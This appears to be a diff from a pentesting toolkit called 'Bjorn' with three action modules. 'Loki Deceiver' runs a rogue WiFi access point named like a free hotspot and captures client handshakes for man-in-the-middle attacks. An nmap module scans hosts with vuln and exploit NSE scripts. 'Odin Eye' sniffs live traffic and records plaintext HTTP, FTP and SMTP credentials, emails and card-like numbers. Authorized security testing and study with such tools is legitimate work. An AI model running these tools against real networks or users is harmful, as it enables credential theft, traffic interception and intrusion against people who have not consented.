b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
b_args = {
"interface": {
"type": "text",
"label": "Wireless Interface",
"default": "wlan0"
},
"ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hostapd_proc = None
self.dnsmasq_proc = None
self.tcpdump_proc = None
self._sniffer = None
self.active_clients = set()
self.stop_event = threading.Event()
self.lock = threading.Lock()
def _setup_monitor_mode(self, iface: str):
logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
def _create_configs(self, iface, ssid, channel, password):
# hostapd.conf
h_conf = [
f'interface={iface}',
'driver=nl80211',
f'ssid={ssid}',
'hw_mode=g',
f'channel={channel}',
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
# dnsmasq.conf
d_conf = [
f'interface={iface}',
'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
d_path = '/tmp/bjorn_dnsmasq.conf'
with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
return h_path, d_path
def _packet_callback(self, packet):
if self.shared_data.orchestrator_should_exit:
return
if packet.haslayer(Dot11):
addr2 = packet.addr2 # Source MAC
if addr2 and addr2 not in self.active_clients:
# Association request or Auth
if packet.type == 0 and packet.subtype in [0, 11]:
with self.lock:
self.active_clients.add(addr2)
logger.success(f"LokiDeceiver: New client detected: {addr2}")
self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
if EAPOL and packet.haslayer(EAPOL):
logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except Exception: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__":
from init_shared import shared_data
loki = LokiDeceiver(shared_data)
loki.execute("0.0.0.0", None, {}, "loki_deceiver")

View File

@@ -1,188 +1,460 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
"""
Vulnerability Scanner Action
Ultra-fast CPE scan (plus CVEs via vulners when available),
with an optional "heavy" fallback.
Reports progress as a percentage in Bjorn.
"""
import os
import pandas as pd
import subprocess
import re
import time
import nmap
import json
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
# Regex compiled only once (CPU savings on the Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
# No shared self.nm: a PortScanner is instantiated inside each scan method
# to avoid state corruption between batches.
logger.info("NmapVulnScanner initialized")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
# ---------------------------- Public API ---------------------------- #
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
# Read existing data
df = pd.read_csv(self.summary_file)
logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
if self.shared_data.orchestrator_should_exit:
return 'failed'
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# 1) Metadata
meta = {}
try:
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# 2) Fetch the MAC address and ALL the ports
mac = row.get("MAC Address") or row.get("mac_address") or ""
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
ports_str = ""
if mac:
r = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if r and r[0].get('ports'):
ports_str = r[0]['ports']
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
meta.get("ports_snapshot") or ""
)
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
if not ports_str:
logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed'
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
# Clean up ports (keep just the number for entries like 80/tcp)
ports = [p.split('/')[0] for p in ports]
return combined_result if success else None
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
# 3) "Rescan only" filtering
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
if not ports:
logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success'
# 4) SCAN WITH PROGRESS REPORTING
if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
# 5) In-memory deduplication before persistence
findings = self._deduplicate_findings(findings)
# 6) Persistence
self.save_vulnerabilities(mac, ip, findings)
# Finalize the UI
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
if not ports:
return []
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
seen[str(r['port'])] = r.get('last_seen')
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
final_ports = []
for p in ports:
if p not in seen:
final_ports.append(p)
else:
capture = False
return "; ".join(vulnerabilities)
try:
dt = datetime.fromisoformat(seen[p].replace('Z', ''))
if dt < cutoff:
final_ports.append(p)
except Exception:
pass
return final_ports
else:
return [p for p in ports if p not in seen]
def save_results(self, mac_address, ip, scan_result):
# ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
def extract_cves(self, text: str) -> List[str]:
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
if not text:
return []
return CVE_RE.findall(str(text))
# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""
Saves the detailed scan results to a file.
Orchestrates the scan in batches so the progress
bar can be updated between batches.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
# Pausing between batches matters on the Pi Zero: it lets the CPU breathe
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
# Small batch size by default (2 on the Pi Zero, configurable)
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return []
batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
processed_count = 0
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Update the UI before scanning the batch
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan the batch (local instantiation to avoid state corruption)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Post-batch update
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# CPU pause between batches (vital on the Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
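The batching arithmetic above (port cap, fixed-size batches, UI percentage derived from the count of processed ports) can be sketched standalone; the helper names below are illustrative, not part of the module:

```python
# Sketch of the batch planning and progress math in scan_vulnerabilities.
def plan_batches(ports, max_ports=10, batch_size=2):
    """Cap the port list, then split it into fixed-size batches."""
    target = ports[:max_ports]
    return [target[i:i + batch_size] for i in range(0, len(target), batch_size)]

def progress_pct(processed, total):
    """Integer percentage shown in the UI; 100 when there is nothing to do."""
    return int((processed / total) * 100) if total else 100

ports = ['21', '22', '80', '443', '8080']
print(plan_batches(ports))   # [['21', '22'], ['80', '443'], ['8080']]
print(progress_pct(4, 5))    # 80
```

The last batch may be shorter than `batch_size`, which is why the progress counter advances by `len(batch)` rather than by a fixed step.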
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
vulns: List[Dict] = []
nm = nmap.PortScanner()  # Local instance; no shared state
# --version-light instead of --version-all: much faster on the Pi Zero
# --min-rate/--max-rate: avoids saturating the CPU and the network
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns
if ip not in nm.all_hosts():
return vulns
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# CPE
for cpe in self._extract_cpe_values(port_info):
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE: {cpe}"
})
# CVE via vulners
if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
vulns.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:200]
})
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
vulnerabilities: List[Dict] = []
nm = nmap.PortScanner()  # Local instance
vuln_scripts = [
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate so the Pi is not saturated
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving summary: {e}")
logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
if ip not in nm.all_hosts():
return vulnerabilities
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
host = nm[ip]
discovered_ports_in_batch: set = set()
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports_in_batch.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for future in as_completed(futures):
progress.update(task, advance=1)
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")
# Optional CPE scan (on this batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
cpe_vulns = []
nm = nmap.PortScanner()  # Local instance
try:
port_list = ','.join([str(p) for p in ports])
# --version-light instead of --version-all (much faster)
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in nm.all_hosts():
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for cpe in self._extract_cpe_values(port_info):
cpe_vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE: {cpe}"
})
except Exception as e:
logger.error(f"scan_cpe failed for {ip}: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception:
pass
findings_by_port: Dict[int, Dict] = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {'cves': set(), 'cpes': set()}
vid = str(f.get('vuln_id', ''))
vid_upper = vid.upper()
if vid_upper.startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid_upper.startswith('CPE:'):
# Stored without the "CPE:" prefix
findings_by_port[port]['cpes'].add(vid[4:])
# 1) CVEs
for port, data in findings_by_port.items():
for cve in data['cves']:
try:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
""", (mac, ip, hostname, port, cve))
except Exception as e:
logger.error(f"Save CVE err: {e}")
# 2) CPEs
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac, cpe=cpe, ip=ip,
hostname=hostname, port=port
)
except Exception as e:
logger.error(f"Save CPE err: {e}")
logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")

247
actions/odin_eye.py Normal file
View File

@@ -0,0 +1,247 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os
import json
try:
import pyshark
HAS_PYSHARK = True
except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="odin_eye.py")
# -------------------- Action metadata --------------------
b_class = "OdinEye"
b_module = "odin_eye"
b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4 # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"
b_args = {
"interface": {
"type": "select",
"label": "Network Interface",
"choices": ["auto", "wlan0", "eth0"],
"default": "auto",
"help": "Interface to listen on."
},
"filter": {
"type": "text",
"label": "BPF Filter",
"default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
},
"max_packets": {
"type": "number",
"label": "Max packets",
"min": 100,
"max": 100000,
"step": 100,
"default": 1000
},
"save_creds": {
"type": "checkbox",
"label": "Save Credentials",
"default": True
}
}
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
'password': [r'password=([^&]+)', r'pass=([^&]+)']
},
'ftp': {
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
'password': [r'PASS\s+(.+)']
},
'smtp': {
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
}
}
class OdinEye:
def __init__(self, shared_data):
self.shared_data = shared_data
self.capture = None
self.stop_event = threading.Event()
self.statistics = defaultdict(int)
self.credentials: List[Dict[str, Any]] = []
self.lock = threading.Lock()
def process_packet(self, packet):
"""Analyze a single packet for patterns and credentials."""
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
# HTTP
if hasattr(packet, 'http'):
self._analyze_http(packet)
# FTP
elif hasattr(packet, 'ftp'):
self._analyze_ftp(packet)
# SMTP
elif hasattr(packet, 'smtp'):
self._analyze_smtp(packet)
# Payload generic check
if hasattr(packet.tcp, 'payload'):
self._analyze_payload(packet.tcp.payload)
except Exception as e:
logger.debug(f"Packet processing error: {e}")
def _analyze_http(self, packet):
if hasattr(packet.http, 'request_uri'):
uri = packet.http.request_uri
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
m = re.findall(pattern, uri, re.I)
if m:
self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_ftp(self, packet):
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
field = 'username' if cmd == 'USER' else 'password'
self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
def _analyze_smtp(self, packet):
if hasattr(packet.smtp, 'command_line'):
line = packet.smtp.command_line
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
m = re.findall(pattern, line, re.I)
if m:
self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
}
for name, pattern in patterns.items():
m = re.findall(pattern, payload)
if m:
self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
def _add_cred(self, proto, field, value, source):
with self.lock:
cred = {
'protocol': proto,
'type': field,
'value': value,
'timestamp': datetime.now().isoformat(),
'source': source
}
if cred not in self.credentials:
self.credentials.append(cred)
logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
def execute(self, ip, port, row, status_key) -> str:
"""Standard entry point."""
if not HAS_PYSHARK:
logger.error("OdinEye: pyshark is not installed; cannot capture.")
return "failed"
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
if iface == "auto":
iface = None # pyshark handles None as default
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
try:
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
start_time = time.time()
packet_count = 0
# Use sniff_continuously for real-time processing
for packet in self.capture.sniff_continuously():
if self.shared_data.orchestrator_should_exit:
break
if time.time() - start_time > timeout:
logger.info("OdinEye: Timeout reached.")
break
packet_count += 1
if packet_count >= max_pkts:
logger.info("OdinEye: Max packets reached.")
break
self.process_packet(packet)
# Periodic progress update (every 50 packets)
if packet_count % 50 == 0:
prog = int((packet_count / max_pkts) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
except Exception as e:
logger.error(f"Capture error: {e}")
self.shared_data.log_milestone(b_class, "Error", str(e))
return "failed"
finally:
if self.capture:
try:
self.capture.close()
except Exception:
pass
# Save results
if self.credentials or self.statistics['total_packets'] > 0:
os.makedirs(output_dir, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
json.dump({
"stats": dict(self.statistics),
"credentials": self.credentials
}, f, indent=4)
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
return "success"
if __name__ == "__main__":
from init_shared import shared_data
eye = OdinEye(shared_data)
eye.execute("0.0.0.0", None, {}, "odin_eye")
